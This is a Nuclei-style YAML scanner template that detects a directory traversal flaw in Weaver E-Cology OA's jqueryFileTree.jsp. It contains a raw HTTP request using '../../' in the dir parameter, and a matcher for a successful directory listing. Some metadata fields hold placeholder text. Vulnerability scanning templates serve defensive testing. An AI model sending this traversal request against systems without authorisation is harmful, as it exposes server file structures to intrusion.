id: jqueryFileTree_files
info:
  name: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
  author: weehhd
  severity: low
  description: https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../  HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Cookie: ecology_JSessionid=aaaL2h1M03u75gGWFlvWy; JSESSIONID=aaaL2h1M03u75gGWFlvWy; __randcode__=14b07106-d0d3-4b2a-8d34-eff5bf4d8efe
        If-None-Match: "41YKErEedjv"
        If-Modified-Since: Wed, 13 Sep 2023 09:03:26 GMT
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "index.jsp"
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK
